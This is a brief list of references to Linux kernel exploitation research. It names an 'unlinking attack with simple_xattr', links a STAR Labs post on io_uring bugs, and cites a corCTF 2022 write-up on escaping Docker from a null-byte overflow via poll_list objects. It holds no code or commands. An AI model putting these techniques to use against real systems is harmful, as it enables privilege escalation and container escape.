Unlinking attack with simple_xattr

https://www.starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/#unlinking-attack

[corCTF 2022] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel

D3vil